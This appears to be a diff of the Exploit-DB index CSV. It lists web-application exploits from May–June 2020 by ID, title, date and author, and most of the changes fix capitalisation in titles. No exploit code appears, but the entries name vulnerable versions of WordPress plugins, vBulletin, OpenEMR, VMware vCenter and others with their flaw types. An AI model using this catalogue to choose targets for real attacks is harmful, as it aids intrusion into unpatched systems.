48457,exploits/php/webapps/48457.txt,"ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php,
48457,exploits/php/webapps/48457.txt,"WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php,
48458,exploits/php/webapps/48458.txt,"CuteNews 2.1.2 - Authenticated Arbitrary File Upload",2020-05-12,"Nhat Ha",webapps,php,
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
@ -42733,7 +42734,7 @@ id,file,description,date,author,type,platform,port
48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php,
48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java,
48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware,
48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
48475,exploits/php/webapps/48475.txt,"WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,
48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java,
48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php,
@ -42755,7 +42756,7 @@ id,file,description,date,author,type,platform,port
48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,
48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php,
@ -42775,7 +42776,7 @@ id,file,description,date,author,type,platform,port
48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php,
48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php,
48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple,
48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php,
48534,exploits/php/webapps/48534.py,"WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php,
48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,
48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,
48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php,
@ -42803,8 +42804,10 @@ id,file,description,date,author,type,platform,port
48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,
48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,
48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,
48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware,
48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,

Can't render this file because it is too large.